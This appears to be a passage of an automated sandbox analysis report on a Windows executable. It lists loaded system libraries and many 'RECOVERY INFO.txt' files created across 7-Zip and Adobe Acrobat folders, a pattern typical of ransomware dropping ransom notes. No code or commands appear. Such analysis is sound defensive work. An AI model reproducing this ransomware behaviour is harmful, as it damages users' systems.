Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe

File written: C:\ProgramData\Microsoft OneDrive\setup\refcount.ini

Jump to behavior

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\7-Zip\Lang\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\7-Zip\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\locales\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\swiftshader\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\locales\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\swiftshader\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Air\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Assets\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\CAN\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\DEU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\ENU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\FRA\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\JPN\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\UK\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\ENU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\HostedServicesTemplates\ENU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\IDTemplates\ENU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ar_AE\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\cs_CZ\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\da_DK\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\de_DE\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\el_GR\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ENU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_AE\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_GB\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_IL\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_US\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\es_ES\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fi_FI\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_FR\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_MA\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\he_IL\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\hu_HU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\it_IT\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ja_JP\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ko_KR\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nb_NO\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nl_NL\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pl_PL\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pt_BR\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ru_RU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sk_SK\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sl_SI\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sv_SE\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\tr_TR\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\uk_UA\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_CN\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_TW\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Locale\en_US\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\ie\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\regular\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\PMP\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Multimedia\MPP\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\prc\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Sequences\ENU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Tracker\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\__VERSION__\private\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\__VERSION__\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\appmeasurement\prod\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\appmeasurement\stage\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\fonts\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\fonts\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\images\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\js\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\hi_contrast\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\themes\dark\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\hi_contrast\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\themes\dark\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win-scrollbar\themes\dark\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win-scrollbar\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win8-scrollbar\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ca-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\cs-cz\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\da-dk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\de-de\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\en-ae\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\en-gb\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\en-il\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\es-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\eu-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\fi-fi\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\fr-fr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\fr-ma\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\hr-hr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\hu-hu\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\it-it\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ja-jp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ko-kr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\nb-no\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\nl-nl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\pl-pl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\pt-br\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ro-ro\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\root\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ru-ru\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\sk-sk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\sl-si\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\sv-se\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\tr-tr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\uk-ua\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\zh-cn\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\zh-tw\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app-api\dev\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ca-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\cs-cz\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\da-dk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\de-de\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\en-ae\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\en-gb\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\en-il\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\es-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\eu-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\fi-fi\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\fr-fr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\fr-ma\RECOVERY INFO.txt	Jump to behavior
